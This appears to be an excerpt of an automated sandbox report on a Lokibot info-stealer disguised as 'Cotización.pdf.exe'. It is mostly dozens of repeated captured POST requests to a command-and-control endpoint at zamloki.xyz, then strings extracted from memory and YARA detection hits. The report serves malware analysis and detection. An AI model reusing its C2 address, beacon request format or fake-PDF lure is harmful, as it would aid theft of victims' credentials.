              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00404ED4 recv,12_2_00404ED4
              Source: unknownDNS traffic detected: queries for: zamloki.xyz
              Source: unknownHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jul 2021 15:01:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HCu%2BWGot2zpuW5laOc7rLI1l39a6SyWqikMVOpRxztbOUiIp6KZym9YNZO2pIMknfIVVsEI5nQEXhP26PTd67znu106LUnLvFFIGSw28Cq2kLuLTIuTufHdPgO%2FCsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 67254e7e3d562b65-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: Cotizaci#U00f3n.pdf.exe, Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.294308836.0000000005CE0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.460794066.000000000049F000.00000040.00000001.sdmpString found in binary or memory: https://zamloki.xyz/des/co/tox.php

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
